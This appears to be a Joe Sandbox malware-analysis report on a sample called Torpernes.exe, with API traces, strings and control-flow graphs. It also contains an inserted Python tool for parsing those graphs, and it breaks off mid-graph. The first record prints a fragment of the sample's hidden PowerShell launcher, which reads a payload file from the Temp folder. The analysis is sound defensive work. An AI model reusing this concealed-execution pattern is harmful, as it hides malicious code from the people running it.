                                            • SHGetPathFromIDListW.SHELL32(?,Execute: ), ref: 00405FD9
                                            • CoTaskMemFree.OLE32(?), ref: 00405FE4
                                            • lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406008
                                            • lstrlenW.KERNEL32(Execute: ,00000000,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,?,004050F8,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,00000000,0040FE60), ref: 00406062
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: "powershell.exe" -windowstyle hidden$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-2487190391
                                            • Opcode ID: 6ed2ce18e2d539b550dc175a0fdc2c9c6126cdc13d66b6f6a98d78e02c131308
                                            • Instruction ID: 79069b25519764f594e89cf08704c373f390d163d9a81a8315dba2a423a8323b
                                            • Opcode Fuzzy Hash: 6ed2ce18e2d539b550dc175a0fdc2c9c6126cdc13d66b6f6a98d78e02c131308
                                            • Instruction Fuzzy Hash: A761E271A40506ABDF208F25DC44AAF37A5EF50314F21803BE946BA2D0D73D8A92CF5E

                                            Control-flow Graph
                                            • Graph for the function starting at 004056A1 (rendered graph and raw edge list not reproduced; the executed API calls are listed below)
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 004056CA
                                            • lstrcatW.KERNEL32(004246B8,\*.*), ref: 00405712
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405735
                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246B8,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040573B
                                            • FindFirstFileW.KERNEL32(004246B8,?,?,?,00409014,?,004246B8,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040574B
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004057EB
                                            • FindClose.KERNEL32(00000000), ref: 004057FA
                                            Strings
                                            • "C:\Users\user\Desktop\Torpernes.exe", xrefs: 004056AA
                                            • \*.*, xrefs: 0040570C
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-252084881
                                            • Opcode ID: 88fa1dc3ac45dcf4a59ea1ebb406e8f17fdbd40d78c77ddd54cbdf00bcc06bb1
                                            • Instruction ID: 5e0e96141c84f132359e1640c5569076cb8346a5b9e155b5506cdba2f35f624b
                                            • Opcode Fuzzy Hash: 88fa1dc3ac45dcf4a59ea1ebb406e8f17fdbd40d78c77ddd54cbdf00bcc06bb1
                                            • Instruction Fuzzy Hash: 3141B331801A14E6CB217B65CC89ABF7778DB86718F10817BF805722D1D77C4A91EE6E
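The `control_flow_graph` line at the top of this record is the edge list behind the graph image Joe Sandbox renders: `ID start-end [API ...] [call target ...]` defines a basic block and `A->B` an edge. Read in that form it already describes the routine at 4056a1: block 481 calls DeleteFileW, block 500 issues FindFirstFileW on the `\*.*` pattern built in 491, block 510 (FindNextFileW) jumps back to 504, block 522 calls 4056a1, the function's own entry address, and 516 closes the search handle. That is the shape of a routine that deletes a directory tree, here rooted in the user's Temp folder. The Python below is an added example, not part of this report or of Joe Sandbox: it parses such a line into blocks and edges, finds loop back-edges and self-recursive blocks, and emits Graphviz DOT so the graph can be re-rendered offline. The token rules it applies (a block id is an integer followed by a hexadecimal address or range of at least six digits, `call` takes the next token as its target, `* N` repeats the preceding API or call) are assumptions inferred from the dumps on this page.

```python
import re
from dataclasses import dataclass, field

ADDR = re.compile(r'^([0-9a-f]{6,})(?:-([0-9a-f]{6,}))?$')  # "4056a1-4056c7" or "405806"
EDGE = re.compile(r'^(\d+)->(\d+)$')                        # "477->480"


@dataclass
class Block:
    id: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # API names annotated on the block
    calls: list = field(default_factory=list)  # targets of "call <addr>" annotations


def parse_cfg(text):
    """Parse one 'control_flow_graph ...' dump line; returns (entry_id, blocks, edges)."""
    toks = text.split()
    if toks and toks[0] == 'control_flow_graph':
        toks = toks[1:]
    blocks, edges, cur, last, i = {}, [], None, None, 0
    while i < len(toks):
        tok, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else None)
        if m := EDGE.match(tok):
            edges.append((int(m[1]), int(m[2])))
            i += 1
        elif tok.isdigit() and nxt and (a := ADDR.match(nxt)):   # new basic block
            start = int(a[1], 16)
            cur = blocks[int(tok)] = Block(int(tok), start, int(a[2], 16) if a[2] else start)
            last, i = None, i + 2
        elif cur is None:
            raise ValueError(f'annotation {tok!r} precedes the first block')
        elif tok == 'call' and nxt:                               # "call 40596c"
            cur.calls.append(int(nxt, 16))
            last, i = cur.calls, i + 2
        elif tok == '*' and nxt and nxt.isdigit() and last:       # "GetDlgItem * 2"
            last.extend([last[-1]] * (int(nxt) - 1))
            i += 2
        else:                                                     # plain API name
            cur.apis.append(tok)
            last, i = cur.apis, i + 1
    return next(iter(blocks)), blocks, edges                      # first block = entry


def back_edges(entry, edges):
    """Edges that close a loop, found by DFS from the entry block in edge order."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    state, found = {}, []

    def visit(n):
        state[n] = 'open'
        for s in succ.get(n, []):
            if state.get(s) == 'open':
                found.append((n, s))
            elif s not in state:
                visit(s)
        state[n] = 'closed'

    visit(entry)
    return found


def recursive_blocks(entry, blocks):
    """Blocks that call the function's own entry address, i.e. self-recursion."""
    return [b.id for b in blocks.values() if blocks[entry].start in b.calls]


def to_dot(entry, blocks, edges, name='cfg'):
    """Graphviz DOT text (render with `dot -Tsvg`); loop back-edges are drawn red."""
    loops = set(back_edges(entry, edges))
    out = [f'digraph {name} {{', '  node [shape=box fontname="monospace"];']
    for b in blocks.values():
        text = '\\n'.join([f'{b.start:x}-{b.end:x}', *b.apis, *(f'call {c:x}' for c in b.calls)])
        out.append(f'  {b.id} [label="{text}"];')
    out += [f'  {a} -> {b}{" [color=red]" if (a, b) in loops else ""};' for a, b in edges]
    return '\n'.join(out + ['}'])


# Quoted from the first function record on this page (the routine at 4056a1).
RECURSIVE_DELETE_CFG = (
    'control_flow_graph 477 4056a1-4056c7 call 40596c 480 4056e0-4056e7 477->480 481 4056c9-4056db DeleteFileW '
    '477->481 483 4056e9-4056eb 480->483 484 4056fa-40570a call 405e19 480->484 482 40585d-405861 481->482 '
    '485 4056f1-4056f4 483->485 486 40580b-405810 483->486 490 405719-40571a call 4058b0 484->490 '
    '491 40570c-405717 lstrcatW 484->491 485->484 485->486 486->482 489 405812-405815 486->489 '
    '492 405817-40581d 489->492 493 40581f-405827 call 40615c 489->493 494 40571f-405723 490->494 '
    '491->494 492->482 493->482 501 405829-40583d call 405864 call 405659 493->501 497 405725-40572d 494->497 '
    '498 40572f-405735 lstrcatW 494->498 497->498 500 40573a-405756 lstrlenW FindFirstFileW 497->500 498->500 '
    '503 405800-405804 500->503 504 40575c-405764 500->504 517 405855-405858 call 4050c1 501->517 '
    '518 40583f-405842 501->518 503->486 506 405806 503->506 507 405784-405798 call 405e19 504->507 '
    '508 405766-40576e 504->508 506->486 519 40579a-4057a2 507->519 520 4057af-4057ba call 405659 507->520 '
    '509 405770-405778 508->509 510 4057e3-4057f3 FindNextFileW 508->510 509->507 513 40577a-405782 509->513 '
    '510->504 516 4057f9-4057fa FindClose 510->516 513->507 513->510 516->503 517->482 518->492 '
    '521 405844-405853 call 4050c1 call 405cb3 518->521 519->510 522 4057a4-4057ad call 4056a1 519->522 '
    '530 4057db-4057de call 4050c1 520->530 531 4057bc-4057bf 520->531 521->482 522->510 530->510 '
    '534 4057c1-4057d1 call 4050c1 call 405cb3 531->534 535 4057d3-4057d9 531->535 534->510 535->510'
)

if __name__ == '__main__':
    entry, blocks, edges = parse_cfg(RECURSIVE_DELETE_CFG)
    print(f'{len(blocks)} blocks, {len(edges)} edges, loops={back_edges(entry, edges)}, '
          f'self-recursive={recursive_blocks(entry, blocks)}')
    print(to_dot(entry, blocks, edges, 'sub_4056a1'))
```

Back-edge detection depends on the DFS visiting successors in the order the edges are listed, which is what the dump gives; for this routine the only back-edge is 510->504 (the FindNextFileW loop) and the only self-recursive block is 522.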

                                            Control-flow Graph (image legend: Executed / Not Executed)
                                            control_flow_graph 765 40646e-406473 766 4064e4-406502 765->766 767 406475-4064a4 765->767 768 406ada-406aef 766->768 769 4064a6-4064a9 767->769 770 4064ab-4064af 767->770 771 406af1-406b07 768->771 772 406b09-406b1f 768->772 773 4064bb-4064be 769->773 774 4064b1-4064b5 770->774 775 4064b7 770->775 776 406b22-406b29 771->776 772->776 777 4064c0-4064c9 773->777 778 4064dc-4064df 773->778 774->773 775->773 782 406b50-406b5c 776->782 783 406b2b-406b2f 776->783 779 4064cb 777->779 780 4064ce-4064da 777->780 781 4066b1-4066cf 778->781 779->780 784 406544-406572 780->784 788 4066d1-4066e5 781->788 789 4066e7-4066f9 781->789 790 4062f2-4062fb 782->790 785 406b35-406b4d 783->785 786 406cde-406ce8 783->786 791 406574-40658c 784->791 792 40658e-4065a8 784->792 785->782 794 406cf4-406d07 786->794 793 4066fc-406706 788->793 789->793 795 406301 790->795 796 406d09 790->796 797 4065ab-4065b5 791->797 792->797 799 406708 793->799 800 4066a9-4066af 793->800 798 406d0c-406d10 794->798 802 406308-40630c 795->802 803 406448-406469 795->803 804 4063ad-4063b1 795->804 805 40641d-406421 795->805 796->798 807 4065bb 797->807 808 40652c-406532 797->808 816 406c90-406c9a 799->816 817 40668e-4066a6 799->817 800->781 806 40664d-406657 800->806 802->794 809 406312-40631f 802->809 803->768 818 4063b7-4063d0 804->818 819 406c5d-406c67 804->819 810 406427-40643b 805->810 811 406c6c-406c76 805->811 812 406c9c-406ca6 806->812 813 40665d-406826 806->813 824 406511-406529 807->824 825 406c78-406c82 807->825 814 4065e5-4065eb 808->814 815 406538-40653e 808->815 809->796 823 406325-40636b 809->823 826 40643e-406446 810->826 811->794 812->794 813->790 821 406649 814->821 822 4065ed-40660b 814->822 815->784 815->821 816->794 817->800 828 4063d3-4063d7 818->828 819->794 821->806 829 406623-406635 822->829 830 40660d-406621 822->830 831 406393-406395 823->831 832 40636d-406371 823->832 824->808 825->794 826->803 826->805 828->804 833 4063d9-4063df 828->833 836 406638-406642 829->836 830->836 839 4063a3-4063ab 831->839 840 406397-4063a1 831->840 837 406373-406376 GlobalFree 832->837 838 40637c-40638a GlobalAlloc 832->838 834 4063e1-4063e8 833->834 835 406409-40641b 833->835 841 4063f3-406403 GlobalAlloc 834->841 842 4063ea-4063ed GlobalFree 834->842 835->826 836->814 843 406644 836->843 837->838 838->796 844 406390 838->844 839->828 840->839 840->840 841->796 841->835 842->841 846 406c84-406c8e 843->846 847 4065ca-4065e2 843->847 844->831 846->794 847->814
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction ID: ae9914dfc4ac9262e96535a7831571a61538a3842dbab95f7124da8c3de4ab96
                                            • Opcode Fuzzy Hash: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction Fuzzy Hash: 5DF17470D00269CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D3385A96CF44
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                            • LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: AddressHandleLibraryLoadModuleProc
                                            • String ID:
                                            • API String ID: 310444273-0
                                            • Opcode ID: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                            • Instruction ID: d59e4f76ea54ee6613c1ff2f51ee10f72fe9a31321e3e9c366c23c5334b73836
                                            • Opcode Fuzzy Hash: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                            • Instruction Fuzzy Hash: 34E0CD32A081205BD7114B20AD4497773ACAFAD6513090439F946F61C0C774AC11DBA9
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00425700,00424EB8,004059B5,00424EB8,00424EB8,00000000,00424EB8,00424EB8,?,?,74DF3420,004056C1,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406167
                                            • FindClose.KERNEL32(00000000), ref: 00406173
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 54be26efcda8f8bc2bf431c8d080f48db8f5fcc922e20f0f7d49f1037f8b3b84
                                            • Instruction ID: d2aa42ffe149e5aa11787ac58577a942bceb9626eff865f42483859dd930ae1e
                                            • Opcode Fuzzy Hash: 54be26efcda8f8bc2bf431c8d080f48db8f5fcc922e20f0f7d49f1037f8b3b84
                                            • Instruction Fuzzy Hash: A7D012319490309BC2015B787D0CC5B7AB8AF553307614A72F426F63F0C3389C66869D

                                            Control-flow Graph (image legend: Executed / Not Executed)
                                            control_flow_graph 174 4037ac-4037c4 call 406183 177 4037c6-4037d6 call 405d60 174->177 178 4037d8-40380f call 405ce6 174->178 185 403832-40385b call 403a82 call 40596c 177->185 183 403811-403822 call 405ce6 178->183 184 403827-40382d lstrcatW 178->184 183->184 184->185 192 403861-403866 185->192 193 4038ed-4038f5 call 40596c 185->193 192->193 194 40386c-403894 call 405ce6 192->194 199 403903-403928 LoadImageW 193->199 200 4038f7-4038fe call 405e3b 193->200 194->193 201 403896-40389a 194->201 203 4039a9-4039b1 call 40140b 199->203 204 40392a-40395a RegisterClassW 199->204 200->199 206 4038ac-4038b8 lstrlenW 201->206 207 40389c-4038a9 call 405891 201->207 216 4039b3-4039b6 203->216 217 4039bb-4039c6 call 403a82 203->217 208 403960-4039a4 SystemParametersInfoW CreateWindowExW 204->208 209 403a78 204->209 213 4038e0-4038e8 call 405864 call 405e19 206->213 214 4038ba-4038c8 lstrcmpiW 206->214 207->206 208->203 211 403a7a-403a81 209->211 213->193 214->213 215 4038ca-4038d4 GetFileAttributesW 214->215 220 4038d6-4038d8 215->220 221 4038da-4038db call 4058b0 215->221 216->211 227 4039cc-4039e9 ShowWindow LoadLibraryW 217->227 228 403a4f-403a50 call 405194 217->228 220->213 220->221 221->213 230 4039f2-403a04 GetClassInfoW 227->230 231 4039eb-4039f0 LoadLibraryW 227->231 232 403a55-403a57 228->232 233 403a06-403a16 GetClassInfoW RegisterClassW 230->233 234 403a1c-403a3f DialogBoxParamW call 40140b 230->234 231->230 235 403a71-403a73 call 40140b 232->235 236 403a59-403a5f 232->236 233->234 240 403a44-403a4d call 4036fc 234->240 235->209 236->216 238 403a65-403a6c call 40140b 236->238 238->216 240->211
                                            APIs
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • lstrcatW.KERNEL32(1033,004226B0), ref: 0040382D
                                            • lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes,1033,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 004038AD
                                            • lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes,1033,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000), ref: 004038C0
                                            • GetFileAttributesW.KERNEL32(Execute: ), ref: 004038CB
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes), ref: 00403914
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            • RegisterClassW.USER32(00428160), ref: 00403951
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403969
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040399E
                                            • ShowWindow.USER32(00000005,00000000), ref: 004039D4
                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 004039E5
                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 004039F0
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428160), ref: 00403A00
                                            • GetClassInfoW.USER32(00000000,RichEdit,00428160), ref: 00403A0D
                                            • RegisterClassW.USER32(00428160), ref: 00403A16
                                            • DialogBoxParamW.USER32(?,00000000,00403B4F,00000000), ref: 00403A35
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 914957316-1804975888
                                            • Opcode ID: 27e933666a5dd111bd57d2a66a215dc62cf51cbb1b42b3929541858357a70e56
                                            • Instruction ID: 14839756d10fa0731cf70e8e297f409d05a37e9ae1d242a0fae1affd4733ed22
                                            • Opcode Fuzzy Hash: 27e933666a5dd111bd57d2a66a215dc62cf51cbb1b42b3929541858357a70e56
                                            • Instruction Fuzzy Hash: FA61C771604200BEE320AF669D46F3B3A6CEB84745F40457FF941B62E2D7796D12CA2D

                                            Control-flow Graph (image legend: Executed / Not Executed)
                                            control_flow_graph 245 403b4f-403b61 246 403ca2-403cb1 245->246 247 403b67-403b6d 245->247 249 403d00-403d15 246->249 250 403cb3-403cee GetDlgItem * 2 call 404027 KiUserCallbackDispatcher call 40140b 246->250 247->246 248 403b73-403b7c 247->248 251 403b91-403b94 248->251 252 403b7e-403b8b SetWindowPos 248->252 254 403d55-403d5a call 404073 249->254 255 403d17-403d1a 249->255 272 403cf3-403cfb 250->272 256 403b96-403ba8 ShowWindow 251->256 257 403bae-403bb4 251->257 252->251 262 403d5f-403d7a 254->262 259 403d1c-403d27 call 401389 255->259 260 403d4d-403d4f 255->260 256->257 263 403bd0-403bd3 257->263 264 403bb6-403bcb DestroyWindow 257->264 259->260 282 403d29-403d48 SendMessageW 259->282 260->254 267 403ff4 260->267 268 403d83-403d89 262->268 269 403d7c-403d7e call 40140b 262->269 273 403bd5-403be1 SetWindowLongW 263->273 274 403be6-403bec 263->274 271 403fd1-403fd7 264->271 270 403ff6-403ffd 267->270 278 403fb2-403fcb DestroyWindow EndDialog 268->278 279 403d8f-403d9a 268->279 269->268 271->267 276 403fd9-403fdf 271->276 272->249 273->270 280 403bf2-403c03 GetDlgItem 274->280 281 403c8f-403c9d call 40408e 274->281 276->267 283 403fe1-403fea ShowWindow 276->283 278->271 279->278 284 403da0-403ded call 405e3b call 404027 * 3 GetDlgItem 279->284 285 403c22-403c25 280->285 286 403c05-403c1c SendMessageW IsWindowEnabled 280->286 281->270 282->270 283->267 315 403df7-403e33 ShowWindow KiUserCallbackDispatcher call 404049 EnableWindow 284->315 316 403def-403df4 284->316 290 403c27-403c28 285->290 291 403c2a-403c2d 285->291 286->267 286->285 293 403c58-403c5d call 404000 290->293 294 403c3b-403c40 291->294 295 403c2f-403c35 291->295 293->281 296 403c42-403c48 294->296 297 403c76-403c89 SendMessageW 294->297 295->297 300 403c37-403c39 295->300 301 403c4a-403c50 call 40140b 296->301 302 403c5f-403c68 call 40140b 296->302 297->281 300->293 311 403c56 301->311 302->281 312 403c6a-403c74 302->312 311->293 312->311 319 403e35-403e36 315->319 320 403e38 315->320 316->315 321 403e3a-403e68 GetSystemMenu EnableMenuItem SendMessageW 319->321 320->321 322 403e6a-403e7b SendMessageW 321->322 323 403e7d 321->323 324 403e83-403ec1 call 40405c call 